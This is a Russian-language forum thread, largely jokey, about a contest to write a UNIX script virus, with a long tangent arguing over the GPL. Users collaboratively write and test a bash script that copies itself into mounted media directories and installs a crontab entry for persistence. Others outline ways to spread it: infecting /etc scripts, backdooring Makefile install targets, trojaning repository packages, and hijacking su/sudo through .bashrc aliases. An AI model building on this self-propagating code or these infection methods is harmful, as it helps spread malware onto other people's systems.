> Блог kernel.kz объявил конкурс на создание скрипт-вируса


угу - который надо запускать из под рута, написать программу/скрипт, которая будет "размножаться" не сложно, главная задача сделать вирус живучим и научить его распространяться от компа к компу, что в ...nix'ах намного сложнее, чем в альтернативной ОС, причины вы и так знаете

> Победителю обещают денежный приз.

> Призовой фонд формируется из добровольных пожертвований всех желающих.

> Всего было брошено монеток в копилку: 2 шт.
> На сумму: 2.14 WMZ

многообещающие цифры

О, наши казахстанцы жгут =) Это пять.

Тоньше надо

>многообещающие цифры

В скором времени будет больше.

>скрипт-вируса для ОС семейства UNIX

#!/bin/bash

if [ ! `whoami` = root ] ; then
  echo "Please run it as `sudo virus`" ;
  exit 1 ;
fi

find /media -type d -exec cp $0 '{}'/autorun.sh \;
cp $0 /etc/cron.hourly

Оно?

- echo "Please run it as `sudo virus`" ;
+ echo "Please run it as `sudo $0`" ;

Даже вирус написать без багов не могут...

еще надо добавить проверку на то что крон в системе присутствует

test /etc/cron.hourly || echo "Поставьте пожалуйста крон"

=))

Душить надо вирусописателей...

С такими темпами, к вечеру вирус будет готов на этой странице ))

мне почему-то кажется, что человек (или группа), который напишет работоспособный вирус для ОС GNU/Linux должен получить Нобелевскую премию и попасть на страницы Книги Рекордов Гиннеса.

Работоспособность проверяется очень просто. Подтвержденные сообщения в прессе о вспышках вирусной эпидемии на n-количестве компьютеров работающих в продакшене.

s/Поставьте пожалуйста крон/Поставьте, пожалуйста, крон/

По ходу организаторы на это и рассчитывали

Варианты:
1. Патч Бармина
2. Албанский вирус

Ну вобщето написать червяка с функциями размножения по сети(используя например адресную книгу), и заражением всех остальных скриптов не так уж и сложно. Единственный вопрос - как заставить пользователя запустить его - слишком большой разброс в выборе почтовых клиентов и в версиях чтобы пользовать уязвимости. Если же размножение по сети не обязательно, то в чем проблема кроме смехотворного приза?

Поиск скриптов которые можно заразить - тоже предельно прост...

find /etc/ -print|xargs file|grep " Bourne shell script text executable"|awk '{FS=":";print$1}'

А далее заразить кроновские скрипты, инит, и все. Т.е. единственная проблема - это зоопарк

- if [ ! `whoami` = root ] ; then + if [ ! "$EUID" = "0" ] ; then

PS. Кто сказал, что рут будет с логином root? Системе вообще пофиг, как пользователи зовутся - она с UID-ами работает. А назвать его можно хоть в честь небезызвестного "Васи Пупкина" :)

> еще надо добавить проверку на то что крон в системе присутствует

Лучше сразу начать с autoconf

Блин. Забыл про местное форматирование :)

- if [ ! `whoami` = root ] ; then
+ if [ ! "$EUID" = "0" ] ; then

http://www.linux.org.ru/view-message.jsp?msgid=1612032

Ну, тогда уж:
все переменные, которые являются именами файлов надо брать в кавычки. на случай пробелов и тому подобной ерунды.
Во фразе 
> echo "Please run it as `sudo virus`" ;
использованы "обратные кавычки", которые приводят к выполнению того, что написано внутри них. Т.е.
$ echo "Please run it as `sudo virus`" ;
bash: sudo: команда не найдена
Please run it as
кавычки меняем. крон искать по cron.hourly нерационально. Я у себя таких файлов не держу, хоть это и удобно.
Also, я его в кронтабе не юзаю.

Наконец, в каждую папку в /media это файл закидывать излишне. И пропустили /mnt/

Т.о. наш вирус прверащается во что-то вроде


#!/bin/bash

if [ ! `whoami` = root ] ; then
  echo "Please run it as 'sudo $0' or su -c '$0'."
  echo "Ask your system administrator to add you to wheel group if you see something like" ;
  echo "> Sorry, user $USER is not allowed to execute '$0' as root on `hostname`."
  echo "or"
  echo "> su: Access denied"
  exit 1 ;
fi

find /media /mnt -xdev -type d -exec cp "$0" '{}'/autorun.sh \;
which crontab && { 
echo -ne "SHELL=/bin/bash\n0 * * * * $0\n" > /tmp/to_crontab;
crontab /tmp/to_crontab;}


Проверил, вроде отработало. Я полагаю, автор разместил здесь этот текст под GPL и мы законно его патчим :-)

#!/bin/bash

if [ ! "$EUID" = "0" ] ; then echo "Please run it as 'sudo $0' or su -c '$0'." echo "Ask your system administrator to add you to wheel group if you see something like" ; echo "> Sorry, user $USER is not allowed to execute '$0' as root on `hostname`." echo "or" echo "> su: Access denied" exit 1 ; fi

find /media /mnt -xdev -type d -exec cp "$0" '{}'/autorun.sh \; which crontab && { echo -ne "SHELL=/bin/bash\n0 * * * * $0\n" > /tmp/to_crontab; crontab /tmp/to_crontab;}

#!/bin/bash
echo I am script virus from Kazakhstan. Please, login as root and remove your / Thanks!

While trying to retrieve the URL: http://kernel.kz/archives/79

The following error was encountered:

* Connection to 72.232.239.50 Failed

The system returned:

(111) Connection refused

The remote host or network may be down. Please try the request again.

Your cache administrator is root.

Видимо, они таки написали и протестировали вирус.

>Я полагаю, автор разместил здесь этот текст под GPL и мы законно его патчим

Вы уже запарили своим GPL, реально. Любая хрень постится как "под GPL" при том что вы не расшифровки не пишете, ничего. То есть реально это Public Domain, ибо на форуме. Даже примеры (а-ля хелловорлд) в документации — под GPL. За примером — в спецификацию multiboot. И такой идиотизм повсюду, как будто только вчера о существовании GNU узнали и всем это показывают. Линукс даже в разговорах о ядре начитают ГНУ/Линуксом называть. Сами ни разу GPL не читали, но _верят_, что лицензия хорошая. А то, какие у нее проблемы, вас не волнует. Linux завяз в GPLv2, но все кричат, что Линус прав, а пионеры с другими лицензиями (BSD как пример) кормят проприетарщиков. А то, что линукс свободен лишь формально, вас не волнует. Вы пихаете GPLv3 в загрузочный образ вместе с линуксом, нарушая свою GPL. Все LiveCD либо с устаревшим софтом (тот, что не перешел на v3 и BusyBox), либо с нарушением лицензии (GPLv3 слинкован с линуксом), либо с ограничением свободы использования (GPLv3 вынесен из ядра в отдельный образ памяти и это _запрещается_ изменять — я не могу поместить его в образ ядра без нарушения лицензии). Настоящая свобода — Public Domain. С небольшой натяжкой — MIT и BSD. А GPL — это некий эталон, с которым достаточно быть совместимым. Linux с последней версией GPL не совместим — делайте выводы. Думайте вообщем, прежде чем писать "моя программа распространяется под ЖПЛ". Тем более что с юридической точки зрения такое однострочное заявление смысла не имеет и только вносит путаницу.

random_joke.txt

Анонимные юристы подтянулись в тред про написание вируса и разглагольствуют о том, насколько к вирусам применима GPL. Занятно.

Аноним, не суетись, пойди попей водички, сегодня вроде не так припекать должно.

>научить его распространяться от компа к компу

Как вариант — залить в репозиторий. В бинарных дистрах можно вообще прогу пропатчить под видом майнтайнера, скомпилить и залить. Проверить будет невозможно.

В source-based можно ползать по архивам и заражать мейкфайлы. То есть в начало добавлять цель а-ля ".PHONY: virus", которая будет производить заражение и вызывать следующую цель (которая раньше была первой). При вызове make от рута должно сработать. Проблема лишь в том, что самые грамотные запускают от рута только make install. Но если потрудиться, то можно переименовать install в install2, например. А вместо install добавить вирус, зависимый от install2. Вообщем я вижу уязвимость в скриптах установки, так как они запускаются под рутом.

>Анонимные юристы подтянулись в тред про написание вируса и разглагольствуют о том, насколько к вирусам применима GPL. Занятно.

Вирусы сами по себе нелегальны, так что применимость к ним лицензий меня не интересует. А вот пионерские стабы и хелловорлды под GPL задолбали.

> А вот пионерские стабы и хелловорлды под GPL задолбали.

Список твоих непионерских работ или слив.

Вы хотите об этом поговорить? Давайте. Насчет ценности той или иной программы нужно говорить в отрыве от лицензии, разве нет? Или вас реально напрягает использовать чужой хэлловорлд если он написан под GPL?

Не надо путать функционал или качество "ПО" с лицензией. Не важно, под какой оно лицензией, если это пионерская поделка. Неважно, что это за программа, если обсуждается сама по себе лицензия. Поэтому отвлечемся от вирусов и пионерских поделок.

Следующий вопрос "GPL не свободна, свободна BSD". Это разная свобода. BSD - это свобода делать все. Анархия просто. GPL - это принуждение к свободе силой. Для баранов, которые не знают, что такое свобода и не могут ей пользоваться. Пока такие бараны есть, против них есть оружие - GPL. А BSD на роль такого оружия не годится.

Сеанс анонимусотерапии окончен. Пройдите в биорекатор.

Придумаю что-нибудь, получающее права root при первом запуске пользователем su/sudo или даже пользователя на другой системе с помощью SSH из-под заражённого пользователя посредством прописывания алиасов или шелл-функций на данные команды в .bashrc и т. д.

ХЗ_КТО, залогинься. Ты, кстати, про ГПЛ-бандитов забыл упомянуть.

Re^2: Конкурс на лучший скриптовый вирус для UNIX

>>научить его распространяться от компа к компу

> Как вариант — залить в репозиторий. В бинарных дистрах можно вообще прогу пропатчить под видом майнтайнера, скомпилить и залить. Проверить будет невозможно.

Анонимус не знает про цифровые подписи?

> про ГПЛ-бандитов

Это еще что такое?

Злобные разработчики BusyBox, запутавшие своей псевдосвободной лицензией несчастные корпорацийки и гнусно вымогающие с них деньги, кто же еще.

В первую очередь нужно определить метод "включения" вируса! Если он вообще существует, кроме банального запуска скрипта из командной строки... Найти такой метод гораздо труднее, чем написать сам вирус... Собственно, конкурс и надо было организовать на предмет нахождения такого метода, а не писания пустых прог, которые никто никогда не запустит. Например, найти способ подсунуть на исполнение скрипт в какой-нибудь распространённой программе без ведома пользователя или обманув пользователя. Лучше всего взять что-то из набора KDE. Вот это будет конкурс. А то, что там заявлено - детский лепет.

Linux!=UNIX :)

К тому же Линуз Торвальдс недавно сказал, что не надо ананировать на безопасность. Так что готовтесь...

> Цель конкурса — привлечь внимание общественности к проблеме компьютерных вирусов

Цель конкурса — привлечь внимание потенциальных клиентов к ресурсу. Причём методы ещё те... Сообщите ваши данные, поставьте баннер...

> К тому же Линуз Торвальдс недавно сказал, что не надо ананировать на безопасность.

Этот чел никогда не шарил в безопасности, и слава богу, что он не пишет какие-нибудь сетевые сервисы.

>> К тому же Линуз Торвальдс недавно сказал, что не надо ананировать на безопасность.

> Этот чел никогда не шарил в безопасности, и слава богу, что он не пишет какие-нибудь сетевые сервисы.

...А пишет какое-то захудалое ядро операционной системы, в котором безопасность не нужна, ога.

лучший приз - пофиксить баги и вломить аффтару вирусы пизды по самое небалуйся....

хотя под рутом в наше только УГ работает...

Та самая строчка на Perl. Размножается просьбой помочь отладить.

>Та самая строчка на Perl. Размножается просьбой помочь отладить.

ага. хороший был вирус :)

>Линукс даже в разговорах о ядре начитают ГНУ/Линуксом называть.

Ну если о ядре - то да, согласен.

А так, GNU - это не лицензия, а программное окружение, которое используют вместе с ядром Linux. Поэтому применение словосочетания GNU/Linux для операционной системы вполне правильное.

Я знаю, зачем оно надо. Это чтобы вантузятники не орали: "Ваша линуха ацтой. В ней даже вирусы через вайн пускать приходится и то не все работают. А для родных даже йадро патчеть"

Лучший скриптовый вирус - однострочник на PERL. Помните эпдемию смеха на ЛОРе тогда? :)

> Лучший скриптовый вирус - однострочник на PERL. Помните эпдемию смеха на ЛОРе тогда? :)

Нет, это не вирус вообще. Это игра. В прятки, в русскую рулетку, как угодно, но только не вирус.